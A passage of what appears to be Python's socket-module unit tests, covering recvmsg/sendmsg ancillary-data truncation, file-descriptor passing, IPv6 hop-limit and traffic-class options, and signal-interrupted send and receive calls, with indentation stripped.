# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
